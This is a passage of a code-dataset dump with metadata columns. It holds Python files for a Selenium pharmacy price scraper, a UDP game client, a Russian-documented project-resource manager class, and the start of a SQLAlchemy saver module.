seq_id string | text string | repo_name string | sub_path string | file_name string | file_ext string | file_size_in_byte int64 | program_lang string | lang string | doc_type string | stars int64 | dataset string | pt string | api list |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
71621333475 | from ast import Try
from dataclasses import replace
from os import rename
import sys
import time
from unicodedata import decimal
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from sqlalchemy import create_engine, text
from sqlalchemy.orm import Session
class CodigoTestado3():
def limparPreco(preco):
if preco == None or preco == '':
return -1
try:
preco = preco.replace('R$ ','')
preco = preco.replace(',','.')
preco = float(preco)
except:
preco = -1
return preco
# FUNCÕES PAGUE MENOS
def coletar_preco_paguemenos(medicamento, driver):
driver.get(medicamento['link'])
try:
preco = WebDriverWait(driver, 10).until(
EC.presence_of_element_located((By.XPATH, '/html/body/div[2]/div/div[1]/div/div/div/div[4]/div/div/div/section/div/div/div/div[1]/div[2]/div/div[3]/div/div[5]/div/div[1]/div[1]/div/div[2]/div/div[2]/span/span'))
)
preco = preco.text
except:
try:
preco = WebDriverWait(driver, 10).until(
EC.presence_of_element_located((By.XPATH, '/html/body/div[2]/div/div[1]/div/div/div/div[4]/div/div/div/section/div/div/div/div[1]/div[2]/div/div[3]/div/div[5]/div/div/div[1]/div/div[2]/div/div/span/span'))
)
preco = preco.text
except:
preco = '-1'
medicamento['preco'] = CodigoTestado3.limparPreco(preco)
def coletar_paguemenos(driver):
medicamentos_paguemenos = [
# {
# 'idfarmacia': 1,
# 'idmedicamento': 1,
# 'preco': -1
#}, #dipirona
{
'idfarmacia': 1,
'idmedicamento': 2,
'link': 'https://www.paguemenos.com.br/advil-400mg-leve-8-pague-6-capsulas/p',
'preco': -1
}, #advil
{
'idfarmacia': 1,
'idmedicamento': 3,
'link': 'https://www.paguemenos.com.br/engov-com-12-comprimidos/p',
'preco': -1
}, #engov
{
'idfarmacia': 1,
'idmedicamento': 4,
'link': 'https://www.paguemenos.com.br/neosaldina-com-10-drageas/p',
'preco': -1
}, #neosaldina
{
'idfarmacia': 1,
'idmedicamento': 5,
'link': 'https://www.paguemenos.com.br/dorflex-36-comprimidos/p',
'preco': -1
}, #dorflex
{
'idfarmacia': 1,
'idmedicamento': 6,
'link': 'https://www.paguemenos.com.br/novalgina-1g-10-comprimidos/p',
'preco': -1
}, #novalgina
{
'idfarmacia': 1,
'idmedicamento': 7,
'link': 'https://www.paguemenos.com.br/sal-de-fruta-eno-efervescente-2-saches-de-5g/p',
'preco': -1
}, #eno
{
'idfarmacia': 1,
'idmedicamento': 8,
'link': 'https://www.paguemenos.com.br/neosoro-solucao-nasal-adulto-com-30-ml/p',
'preco': -1
}, #neosoro
{
'idfarmacia': 1,
'idmedicamento': 9,
'link': 'https://www.paguemenos.com.br/merthiolate-spray-30ml/p',
'preco': -1
}, #mertthiolate
{
'idfarmacia': 1,
'idmedicamento': 10,
'link': 'https://www.paguemenos.com.br/estomazil-em-po-sem-sabor-5g-com-6-envelope/p',
'preco': -1
}, #estomazil
{
'idfarmacia': 1,
'idmedicamento': 11,
'link': 'https://www.paguemenos.com.br/allegra-60mg-com-10-comprimidos/p',
'preco': -1
}, #allegra
{
'idfarmacia': 1,
'idmedicamento': 12,
'link': 'https://www.paguemenos.com.br/descongestionante-vick-vaporub-30g/p',
'preco': -1
}, #vic vaborrub
{
'idfarmacia': 1,
'idmedicamento': 13,
'link': 'https://www.paguemenos.com.br/polaramine-2mg-caixa-com-20-comprimidos/p',
'preco': -1
}, #polaramine
{
'idfarmacia': 1,
'idmedicamento': 14,
'link': 'https://www.paguemenos.com.br/dramin-b6-com-30-comprimidos/p',
'preco': -1
}, #dramin
{
'idfarmacia': 1,
'idmedicamento': 15,
'link': 'https://www.paguemenos.com.br/espironolactona-25mg-com-30-comprimidos-generico-geolab/p',
'preco': -1
}, #espironolactona
{
'idfarmacia': 1,
'idmedicamento': 16,
'link': 'https://www.paguemenos.com.br/insulina-novolin-r-10ml/p',
'preco': -1
} #insulina
]
for medicamento in medicamentos_paguemenos:
CodigoTestado3.coletar_preco_paguemenos(medicamento, driver)
return medicamentos_paguemenos
def registrarDados(lista, sessao):
for preco in lista:
sessao.execute(text("INSERT INTO preco (numpreco, preco, idfarmacia, idmedicamento) VALUES (now(), :preco, :idfarmacia, :idmedicamento)"), preco)
| luanlara/CasosDeTeste4Sem | Caso3/codigoTestado3.py | codigoTestado3.py | py | 5,806 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "selenium.webdriver.support.ui.WebDriverWait",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver.support... |
43502378799 | # -*- coding: utf-8 -*-
__author__ = 'apsmi'
import asynchat, socket, struct, pickle
IN_BUF_SIZE = 128 * (2**10) # размер входящего буфера сокета
OUT_BUF_SIZE = 128 * (2**10) # размер исходящего буфера сокета
LEN_TERM = 4
# сокет, принимающий соединение от клиентов
class Client(asynchat.async_chat):
def __init__(self, addr):
asynchat.async_chat.__init__(self)
self.ibuffer = []
self.obuffer = b""
self.imes = [] #b""
# создаем сокет
self.create_socket(socket.AF_INET, socket.SOCK_DGRAM)
self.bind(('', 0))
client_port = self.socket.getsockname()[1]
# подключаемся к диспетчеру, отправляем ему свой клиентский порт
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', 0))
sock.sendto(struct.pack('L', client_port), addr)
# получем серверный udp порт
buf, _ = sock.recvfrom(4)
server_port = struct.unpack('L',buf)[0]
sock.close()
self.ac_in_buffer_size = IN_BUF_SIZE
self.ac_out_buffer_size = OUT_BUF_SIZE
self.addr = (addr[0], server_port)
self.set_terminator(LEN_TERM)
self.state = "len"
def handle_close(self):
#print(self.socket.getsockname())
self.close()
def writable(self):
return len(self.obuffer) > 0
def handle_write(self):
sent = self.sendto(self.obuffer, self.addr)
self.obuffer = self.obuffer[sent:]
def collect_incoming_data(self, data):
self.ibuffer.append(data)
def found_terminator(self):
dataframe = b"".join(self.ibuffer)
self.ibuffer = []
if self.state == "len":
self.state = "data"
length = struct.unpack('L',dataframe)[0]
self.set_terminator(length)
elif self.state == "data":
self.state = "len"
self.set_terminator(LEN_TERM)
self.imes.append(pickle.loads(dataframe))
if self.imes == "exit":
self.close() | apsmi/PyTanks | client_player.py | client_player.py | py | 2,210 | python | ru | code | 0 | github-code | 1 | [
{
"api_name": "asynchat.async_chat",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "asynchat.async_chat.__init__",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "asynchat.async_chat",
"line_number": 15,
"usage_type": "attribute"
},
{
"ap... |
8431592570 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Модуль класса управления ресурсом проекта.
Описание ресурсного файла проекта информационной системы:
<имя файла> := *.pro
<описание проекта информационной системы> =
[
{<описание проекта текущей информационной системы>},
{<описание проекта импортируемой информационной системы 1> }, Е ,
{ <описание проекта импортируемой информационной системы N> }
] //список
<описание проекта текущей информационной системы> =
{
'имя корневой папки проекта' : <значение папки> ,
'__py__' : <имя корневого пакета модулей питона, создаваемых в рамках текущего проекта>
'__ftl__' : <значение папки шаблонов форм>
'__mth__' : <значение папки методов>
'__env__' : <словарь дополнительных глобальных атрибутов проекта>
} // словарь
<значение папки> =
[
{'имя папки':<значение папки> / <тип ресурса> значения: 'tab' / 'var' / 'win' / 'mnu' / 'svb' / 'frm ' / 'src'}, Е {}
] //список словарей
<значение папки шаблонов форм> =
[
{'имя папки' : <значение папки> / <тип ресурса> значения: 'ftl'}, Е {}
] //список словарей
<значение папки методов> =
[
{'имя папки' : <значение папки> / <тип ресурса> значения: 'mth'}, Е {}
] //список словарей
<описание проекта импортируемой информационной системы> =
{ 'имя корневой папки проекта' : <значение папки> } // словарь
<значение папки> =
{
'type': <тип импортируемой информационной системы>
'name': <имя импортируемой информационной системы>
'__py__': <имя корневого пакета модулей питона, созданных в импортируемой информационной системе>
'link': <тип связи импортируемой информационной системы: определим тип связи импортируемой системы как ССЫЛКА, если информационные ресурсы импортируемой системы расположены НЕ в директории информационных ресурсов текущей системы; определим тип связи импортируемой системы как КОПИЯ, если информационные ресурсы импортируемой системы расположены в директории информационных ресурсов текущей системы; 1 - ССЫЛКА, 0 - КОПИЯ>
'path': <путь к файлу *.pro, содержащему описание структуры импортируемой информационной системы; если link=1, то указан полный путь, он дополняется значением ключа __py__ и используется при сборке, если link=0, то при сборке значение этого ключа не используется, а используется ключ __py__ для получения пути для сборки ресурсов>
}
Пример текущей информационной системы:
{'__py__':'icmodule','бухучет':
[ { 'базы данных':
[{'первичные документы':
[{'приходные':[{'ордер1':'tab'},{'фактура1':'tab'},{'счет-фактура1':'tab'}]},
{'расходные':[{'ордер2':'tab'},{'фактура2':'tab'},{'счет-фактура2':'tab'}]}
]
},
{'прочие':[{}, Е {}]}
]
},
{'переменные':[{},Е{}]}
]
}
<словарь дополнительных глобальных атрибутов проекта> =
{
'имя переменной' : <значение переменной хранимого типа>
}
Переменные и значения попадают в окружение проекта автоматически.
"""
import re
import os.path
import wx
from ic.dlg import dlgfunc
from ic.log import log
from ic.interfaces import resManager
from ic.utils import util
from ic.utils import resfunc
import ic
__version__ = (0, 1, 1, 1)
_ = wx.GetTranslation
# Константы
DEFAULT_PRJ_NAME = 'new_prj'
# Типы ресурсов ('tab','var','win','mnu','svb','frm')
class icPrjRes(resManager.icResourceManagerInterface):
"""
Класс управления ресурсом проекта.
"""
def __init__(self):
"""
Конструктор.
"""
resManager.icResourceManagerInterface.__init__(self)
# Файл проекта
self.prj_file_name = None
# Структура проекта
self._prj = []
def setResFileName(self, res_filename=None):
self.prj_file_name = res_filename
def newPrj(self, prj_name, py_pack=None, prj_template=None):
"""
Создание нового проекта по умолчанию.
:param prj_name: Имя проекта.
:param py_pack: Макет модулей питона.
:param prj_template: Шаблон для создания проекта.
"""
# Файл проекта
prj_res = {}
if prj_template is None:
prj_template = self._newPrjTemplate()
prj_res[prj_name] = prj_template
prj_res['__py__'] = py_pack
prj_res['__env__'] = {'AutoLogin': 'admin',
'AutoPassword': '',
'db_auth': '0',
'db_engine': 'PostgreSQLDB',
'convert_unicode': 'UTF-8',
'dbname': None,
'host': '127.0.0.1',
'user': 'admin',
'sys_table_name': 'resource_tab',
'password': '',
'port': '5432',
'dbstore': '.acc',
}
# Добавить в основную структуру
self._prj = [prj_res]
return prj_res
def _newPrjTemplate(self):
"""
Шаблон нового проекта по умолчанию.
"""
return [{'DB': []},
{'Tables': []},
{'Menu': []},
{'System': []},
{'Forms': []},
{'Metadata': []},
]
def openPrj(self, prj_filename):
"""
Открыть файл проекта.
"""
path, name = os.path.split(prj_filename)
ic.set_ini_file(path)
self.prj_file_name = prj_filename
if os.path.isfile(self.prj_file_name) and os.path.exists(self.prj_file_name):
prj = util.readAndEvalFile(self.prj_file_name, bRefresh=True)
self._prj = self._prepareDataPrj(prj)
# Один метод под двумя именами
load = openPrj
def savePrj(self):
"""
Сохранить проект.
"""
if not self.prj_file_name:
self.prj_file_name = dlgfunc.getFileDlg(None, u'Создание проекта',
u'Project file (*.pro)|*.pro')
if self.prj_file_name:
prj_path = os.path.dirname(self.prj_file_name.strip())
if (not os.path.isdir(prj_path)) or \
(not self._prj[0]['__py__']):
# Если директории проекта не существует, то
# сохранить ее в __py__
self._prj[0]['__py__'] = prj_path
return self._save_prj(self.prj_file_name.strip(), self._prepareDataPrj(self._prj))
return False
# Один метод под двумя именами
save = savePrj
def _prepareDataPrj(self, project):
"""
Подготовка данных проекта для записи/чтения.
"""
if isinstance(project, dict):
project = dict([(key.strip(), self._prepareDataPrj(value)) for key, value in project.items()])
elif isinstance(project, list):
project = [self._prepareDataPrj(value) for value in project]
elif isinstance(project, tuple):
project = tuple([self._prepareDataPrj(value) for value in project])
elif isinstance(project, str):
project = project.strip()
return project
def _save_prj(self, prj_filename, project=None):
"""
Непосредственное сохранение проекта.
:param prj_filename: Имя файла проекта.
:param project: Структура проекта.
:return: Возвращает результат выполнения True/False.
"""
if project is None:
project = self._prepareDataPrj(self._prj)
ok = resfunc.saveResourceText(prj_filename.strip(), project)
# Кроме того, что сохраняем проект, еще делаем его пакетом
resfunc.createInitFile(os.path.dirname(prj_filename.strip()))
return ok
def getPrjRes(self):
return self._prj
def addFolder(self, new_folder_name, dst_folder_name, cur_folder=None):
"""
Добавить папку.
:param new_folder_name: Имя новой папки.
:param dst_folder_name: Имя папки или проекта,
в которую будет добавляться новая папка.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: Результат добавления True|False.
"""
if cur_folder is None:
cur_folder = self.getPrjRoot()
# Если имя папки==имя проекта, то просто добавить
# папку в проект
if dst_folder_name == self.getPrjRootName():
self.getPrjRoot().append({new_folder_name: []})
return True
ok = False
for folder in cur_folder:
folder_name = list(folder.keys())[0]
# Проверять только папки
if isinstance(folder[folder_name], list):
if folder_name == dst_folder_name:
folder[folder_name].append({new_folder_name: []})
ok = True
return ok
else:
add = self.addFolder(new_folder_name, dst_folder_name, folder[folder_name])
if add:
return add
return ok
def addRes(self, new_res_name, res_type, dst_folder_name, cur_folder=None):
"""
Добавить ресурс.
:param new_res_name: Имя нового ресурса.
:param res_type: Тип ресурса ('tab','var','win','mnu','svb','frm').
:param dst_folder_name: Имя папки или проекта,
в которую будет добавляться новая папка.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: Результат добавления True|False.
"""
if cur_folder is None:
cur_folder = self.getPrjRoot()
ok = False
for folder in cur_folder:
folder_name = list(folder.keys())[0]
# Проверять только папки
if isinstance(folder[folder_name], list):
if folder_name == dst_folder_name:
folder[folder_name].append({new_res_name: res_type})
return True
else:
add = self.addRes(new_res_name, res_type, dst_folder_name, folder[folder_name])
if add:
return add
return ok
def delFolder(self, del_folder_name, cur_folder=None):
"""
Удалить папку с именем.
:param del_folder_name: Имя удаляемой папки.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: True-успешное удаление. False-не удален.
"""
if cur_folder is None:
cur_folder = self.getPrjRoot()
del_ok = False
for i_folder in range(len(cur_folder)):
folder = cur_folder[i_folder]
folder_name = list(folder.keys())[0]
# Проверять только папки
if isinstance(folder[folder_name], list):
if folder_name == del_folder_name:
del cur_folder[i_folder]
return True
else:
delete_ok = self.delFolder(del_folder_name, folder[folder_name])
if delete_ok:
return delete_ok
return del_ok
def getFolder(self, folder_name, cur_folder=None):
"""
Взять папку с именем.
:param folder_name: Имя папки.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: Список папки в ресурсе проекта.
"""
if cur_folder is None:
cur_folder = self.getPrjRoot()
for i_folder in range(len(cur_folder)):
folder = cur_folder[i_folder]
cur_folder_name = list(folder.keys())[0]
# Проверять только папки
if isinstance(folder[cur_folder_name], list):
if cur_folder_name == folder_name:
return cur_folder[i_folder]
else:
find_fld = self.getFolder(folder_name, folder[cur_folder_name])
if find_fld is not None:
return find_fld
return None
def getFolderBody(self, folder_name, cur_folder=None):
"""
Взять содержимое папки с именем.
:param folder_name: Имя папки.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: Список папки в ресурсе проекта.
"""
if cur_folder is None:
cur_folder = self.getPrjRoot()
for i_folder in range(len(cur_folder)):
folder = cur_folder[i_folder]
cur_folder_name = list(folder.keys())[0]
# Проверять только папки
if isinstance(folder[cur_folder_name], list):
if cur_folder_name == folder_name:
return cur_folder[i_folder][folder_name]
else:
find_fld = self.getFolderBody(folder_name, folder[cur_folder_name])
if find_fld is not None:
return find_fld
return None
def delRes(self, res_name, res_type=None, cur_folder=None):
"""
Удалить ресурс по имени и типу.
:param res_name: Имя ресурса.
:param res_type: Тип ресурса, если None,
то проверка на тип не производится.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: True-успешное удаление. False-не удален.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
del_ok = False
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
cur_res_name = list(res.keys())[0]
# Проверять только папки
if isinstance(res[cur_res_name], list):
find_res = self.delRes(res_name, res_type, res[cur_res_name])
if find_res:
return find_res
else:
if cur_res_name == res_name and res[cur_res_name] == res_type:
del cur_folder[i_res]
return True
elif cur_res_name == res_name and not res_type:
del cur_folder[i_res]
return True
return del_ok
def getResRef(self, res_name, res_type=None, cur_folder=None):
"""
Получить кортеж указания ресурса по имени и типу.
:param res_name: Имя ресурса.
:param res_type: Тип ресурса, если None,
то проверка на тип не производится.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: Кортеж (Имя ресурса, тип ресурса) или None в случае ошибки.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
ret_res = None
for res in cur_folder:
cur_res_name = list(res.keys())[0]
# Проверять только папки
if isinstance(res[cur_res_name], list):
find_res = self.getResRef(res_name, res_type, res[cur_res_name])
if find_res:
return find_res
else:
if cur_res_name == res_name and res[cur_res_name] == res_type:
return cur_res_name, res[cur_res_name]
elif cur_res_name == res_name and res_type is None:
return cur_res_name, res[cur_res_name]
if ret_res is None:
log.warning(u'Не найден ресурс <%s.%s> %s' % (res_name, res_type, str(cur_folder)))
return ret_res
def getImportSystems(self):
"""
Список импортируемых подсистем.
"""
return self._prj[1:]
def getPyPackage(self):
"""
Пакет модулей питона текущего проекта.
"""
return self._prj[0]['__py__']
def getPrjRootName(self):
"""
Имя корневой папки проекта.
"""
root = self._prj[0]
names = [key for key in root.keys() if not key.startswith('_')]
return names[0]
def setPrjRootName(self, new_prj_root_name):
"""
Имя корневой папки проекта.
"""
new_prj_root_name = new_prj_root_name
root = self._prj[0]
names = [key for key in root.keys() if not key.startswith('_')]
old_prj_root_name = names[0]
prj_root = root[old_prj_root_name]
del self._prj[0][old_prj_root_name]
self._prj[0][new_prj_root_name] = prj_root
def getPrjRoot(self):
"""
Корневая папка проекта.
"""
if not self._prj:
self.newPrj(DEFAULT_PRJ_NAME)
return self._prj[0][self.getPrjRootName()]
def getPyPackageImportSys(self, import_sys):
"""
Пакет модулей питона импортироуемой системы.
"""
return None
def addPackage(self, package_path, new_package_name=None):
"""
Добавить пакет модулей в дерево проектов.
:param package_path: Путь пакета.
:param new_package_name: Имя нового пакета.
:return: Результат добавления True|False.
"""
cur_package_path = package_path
if new_package_name:
cur_package_path = os.path.join(cur_package_path, new_package_name)
return resfunc.createInitFile(cur_package_path)
def addModule(self, module_name, package_path):
"""
Добавить модуль в дерево проектов.
:param module_name: Имя модуля.
:param package_path: Путь пакета.
"""
pass
def renameRes(self, old_name, new_name, cur_folder=None):
"""
Переименовать ресурс/папку.
:param old_name: Старое имя.
:param new_name: Новое имя.
:param cur_folder: Текущая папка, если None,
то берется папка проекта.
:return: Возвращает результат выполнения переименования.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
rename_res = False
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
res_name = list(res.keys())[0]
if res_name == old_name:
cur_folder[i_res] = {new_name: res[res_name]}
return True
elif isinstance(res[res_name], list):
# Если это папка, то обработать все подпапки
rename_res = self.renameRes(old_name, new_name, res[res_name])
if rename_res:
return rename_res
return rename_res
def newSubSys(self, subsys_name, subsys_prj_filename, py_pack):
"""
Создать новую импортируемую подсистему.
:param subsys_name: Имя импортируемой подсистемы.
:param subsys_prj_filename: Файл импортируемой подсистемы.
:param py_pack: Пакет импортируемой подсистмы.
"""
imp_sys = {'name': subsys_name,
'type': 'icSubSys',
'__py__': py_pack,
'link': 0,
'path': subsys_prj_filename}
# Добавить в проект
self._prj.append(imp_sys)
return imp_sys
def isResORFolderByName(self, name, cur_folder=None):
"""
Проверка, есть ли ресурс или папка с таким именем в проекте.
:param name: Имя.
:return: Возвращает результат операции True/False.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
find = False
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
res_name = list(res.keys())[0]
if res_name == name:
return True
elif isinstance(res[res_name], list):
# Если это папка, то обработать все подпапки
find_folder = self.isResORFolderByName(name, res[res_name])
if find_folder:
return find_folder
return find
def isResByNameANDType(self, name, res_type=None, cur_folder=None):
"""
Проверка, есть ли ресурс с таким именем и типом в проекте.
:param name: Имя.
:param res_type: Строковое определение типа ресурса 'tab','frm',...
Если тип None, то проверка по типу не делается.
:return: Возвращает результат операции True/False.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
find = False
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
cur_res_name = list(res.keys())[0]
cur_res_type = res[cur_res_name]
if isinstance(res[cur_res_name], list):
# Если это папка, то обработать все подпапки
find_folder = self.isResByNameANDType(name, res_type, res[cur_res_name])
if find_folder:
return find_folder
elif cur_res_name == name and cur_res_type == res_type:
return True
elif cur_res_name == name and res_type is None:
return True
return find
def getResNameListByType(self, res_type, cur_folder=None):
"""
Список имен ресурсов в проекте по их типу.
:param res_type: Строковое определение типа ресурса 'tab','frm',...
:return: Возвращает список имен ресурсов заданного типа.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
find_list = []
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
cur_res_name = list(res.keys())[0]
cur_res_type = res[cur_res_name]
if isinstance(res[cur_res_name], list):
# Если это папка, то обработать все подпапки
find_folder = self.getResNameListByType(res_type, res[cur_res_name])
if find_folder:
find_list += find_folder
elif cur_res_type == res_type:
find_list.append(cur_res_name)
return find_list
def getResNameListByTypes(self, res_types, cur_folder=None):
"""
Список имен ресурсов в проекте по их типу.
:param res_types: Кортеж строковых определение типа ресурса 'tab','frm',...
:return: Возвращает список имен ресурсов заданных типов.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
find_list = []
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
cur_res_name = list(res.keys())[0]
cur_res_type = res[cur_res_name]
if isinstance(res[cur_res_name], list):
# Если это папка, то обработать все подпапки
find_folder = self.getResNameListByTypes(res_types, res[cur_res_name])
if find_folder:
find_list += find_folder
elif cur_res_type in res_types:
find_list.append(cur_res_name)
return find_list
def getResNamesByTypes(self, *res_types):
"""
Список имен ресурсов в проекте по их типу.
:param res_types: Кортеж строковых определение типа ресурса 'tab','frm',...
:return: Возвращает список имен ресурсов заданных типов.
"""
return self.getResNameListByTypes(*res_types)
def getResFileNamesByResPattern(self, res_pattern, cur_folder=None):
"""
Список имен файлов ресурсов по шаблону ресурса.
:param res_pattern: Кортеж строковых определений шаблонов ресурса '.*\.tab',...
:return: Список имен файлов ресурсов по шаблону ресурса.
"""
if cur_folder is None:
# Отсечь импортитруемые подсистемы
cur_folder = self.getPrjRoot()
find_list = []
for i_res in range(len(cur_folder)):
res = cur_folder[i_res]
res_name = list(res.keys())[0]
res_type = res[res_name]
if isinstance(res[res_name], list):
# Если это папка, то обработать все подпапки
find_folder = self.getResFileNamesByResPattern(res_pattern, res[res_name])
if find_folder:
find_list += find_folder
else:
res_file_name = u''
try:
res_file_name = res_name+'.'+res_type
if [pattern for pattern in res_pattern if re.match(pattern, res_file_name)]:
# Если имя файла подходит под какойлибо шаблон,
# то добавитьв выходной список
find_list.append(res_file_name)
except:
log.fatal(u'Ошибка поиска файла <%s> по шаблону <%s>' % (res_file_name, res_pattern))
return find_list
def getObjectsByResPattern(self, *res_pattern):
"""
Получить список кортежей (тип объекта,имя объекта) по шаблону ресурса.
:param res_pattern: Кортеж строковых определений шаблонов ресурса '.*\.tab',...
:return: Список кортежей (тип объекта,имя объекта) по шаблону ресурса.
"""
obj_list = []
res_file_names = self.getResFileNamesByResPattern(res_pattern)
prj_dir = os.path.dirname(self.prj_file_name)
for res_file_name in res_file_names:
full_res_file_name = os.path.join(prj_dir, res_file_name)
spc = util.readAndEvalFile(full_res_file_name, bRefresh=True)
obj = (spc['type'], spc['name'], spc['description'])
obj_list.append(obj)
return obj_list
def getObjNamesByResPattern(self, *res_pattern):
"""
Имена объектов по шаблону ресурсов.
"""
return [obj[1] for obj in self.getObjectsByResPattern(*res_pattern)]
def getObjectsInResByType(self, res_filename, obj_type, cur_obj=None):
"""
Поиск объектов в ресурсе по типу.
:param res_filename: Имя файла ресурса.
:param OBjType_: Тип объекта, например 'icButton'.
:return: Список кортежей формата:
[('тип объекта','имя объекта','описание'),...]
"""
if cur_obj is None:
spc = util.readAndEvalFile(res_filename, bRefresh=True)
cur_obj = spc[list(spc.keys())[0]]
find_list = []
try:
if cur_obj is None:
# Ресурс пустой
return find_list
if cur_obj['type'] == obj_type:
find_list.append((cur_obj['type'], cur_obj['name'], cur_obj['description']))
if 'child' in cur_obj and cur_obj['child']:
for child in cur_obj['child']:
find_grp = self.getObjectsInResByType(res_filename, obj_type, child)
find_list += find_grp
except:
log.fatal(u'Search error in function getObjectsInResByType: %s, %s, %s' % (res_filename, obj_type, cur_obj))
return find_list
def getObjectsInResByTypes(self, res_filename, obj_types, cur_obj=None):
"""
Поиск объектов в ресурсе по типу.
:param res_filename: Имя файла ресурса.
:param OBjTypes_: Кортеж типов объектов, например ('icButton',).
:return: Список кортежей формата:
[('тип объекта','имя объекта','описание'),...]
"""
if cur_obj is None:
spc = util.readAndEvalFile(res_filename, bRefresh=True)
cur_obj = spc[list(spc.keys())[0]]
find_list = []
try:
if cur_obj is None:
# Ресурс пустой
return find_list
if cur_obj['type'] in obj_types:
find_list.append((cur_obj['type'], cur_obj['name'], cur_obj['description']))
if 'child' in cur_obj and cur_obj['child']:
for child in cur_obj['child']:
find_grp = self.getObjectsInResByTypes(res_filename, obj_types, child)
find_list += find_grp
except:
log.fatal(u'Search error in function getObjectsInResByTypes: (%s, %s, %s)' % (res_filename,
obj_types, cur_obj))
return find_list
def getObjByResPatternANDType(self, res_pattern, obj_type):
"""
Получить список кортежей (тип объекта,имя объекта) по шаблону ресурса и типу объекта.
:param res_pattern: Кортеж строковых определений шаблонов ресурса '.*\.tab',...
:param obj_type: Тип объекта. Например 'icButton'.
:return: Список кортежей (тип объекта,имя объекта) по шаблону ресурса и типу объекта.
"""
obj_list = []
res_file_names = self.getResFileNamesByResPattern(res_pattern)
prj_dir = os.path.dirname(self.prj_file_name)
for res_file_name in res_file_names:
full_res_file_name = os.path.join(prj_dir, res_file_name)
obj_lst = self.getObjectsInResByType(full_res_file_name, obj_type)
obj_list += obj_lst
return obj_list
def getObjByResPatternANDTypes(self, res_pattern, obj_types):
"""
Получить список кортежей (тип объекта,имя объекта) по шаблону ресурса и типу объекта.
:param res_pattern: Кортеж строковых определений шаблонов ресурса '.*\.tab',...
:param obj_types: Кортеж типов объектов, например ('icButton',).
:return: Список кортежей (тип объекта,имя объекта) по шаблону ресурса и типу объекта.
"""
obj_list = []
res_file_names = self.getResFileNamesByResPattern(res_pattern)
prj_dir = os.path.dirname(self.prj_file_name)
for res_file_name in res_file_names:
full_res_file_name = os.path.join(prj_dir, res_file_name)
obj_lst = self.getObjectsInResByTypes(full_res_file_name, obj_types)
obj_list += obj_lst
return obj_list
def isModByName(self, module_name):
"""
Проверить, есть ли модуль с таким именем.
:param module_name: Имя модуля.
:return: Возвращает результат операции True/False.
"""
return False
def isImpSubSys(self, name):
"""
Проверить, является ли name именем импортируемой подсистемы.
:param name: Имя некого ресурса.
:return: Возвращает True/False.
"""
return bool([sub_sys for sub_sys in self.getImportSystems() if sub_sys['name'] == name])
def getImpSubSysIdx(self, name):
"""
Возвращает индекс импортируемой подсистемы по имени.
:param name: Имя подсистемы.
:return: Индекс в структуре ресурсного файла импортируемой подсистемы
с именем name или -1, если такая подсистема в описании не найдена.
"""
find_idx = -1
try:
name_list = ['']+[sub_sys['name'] for sub_sys in self.getImportSystems()]
find_idx = name_list.index(name)
except ValueError:
log.fatal()
find_idx = -1
return find_idx
def delImpSubSys(self, name, bAutoSave=True):
"""
Удалить из файла *.pro импортируемую подсистему по имени.
:param name: Имя подсистемы.
:param bAutoSave: Автоматически сохранить файл *.pro после удаления.
:return: Возвращает True/False.
"""
try:
sub_sys_idx = self.getImpSubSysIdx(name)
if sub_sys_idx > 0:
del self._prj[sub_sys_idx]
if bAutoSave:
self.save()
return True
except:
log.fatal()
return False
def getPrjEnv(self):
"""
Получить словарь дополнительных атрибутов проекта.
"""
if '__env__' in self._prj[0]:
return self._prj[0]['__env__']
return {}
def setPrjEnv(self, env):
"""
Установить словарь дополнительных атрибутов проекта.
"""
self._prj[0]['__env__'] = env
def test():
"""
Функция тестирования.
"""
prj_res = icPrjRes()
prj_res.newPrj('root', None, None, None)
print(prj_res.getPrjRes())
prj_res.addRes('tab1', 'tab', u'Формы')
print(prj_res.getPrjRes())
if __name__ == '__main__':
test()
| XHermitOne/defis3 | ic/prj/PrjRes.py | PrjRes.py | py | 39,301 | python | ru | code | 0 | github-code | 1 | [
{
"api_name": "wx.GetTranslation",
"line_number": 90,
"usage_type": "attribute"
},
{
"api_name": "ic.interfaces.resManager.icResourceManagerInterface",
"line_number": 99,
"usage_type": "attribute"
},
{
"api_name": "ic.interfaces.resManager",
"line_number": 99,
"usage_type... |
41094600245 | # savers
from sqlalchemy import exc
from src import db_manager
def _commit_entity(entity, op_name, detail):
    """Add *entity* to the shared session and commit it.

    Any SQLAlchemy error is routed to the project's exception handler
    instead of propagating, matching the per-saver behaviour the six
    public functions below previously duplicated verbatim.

    :param entity: ORM object to persist.
    :param op_name: Operation label reported to the exception handler.
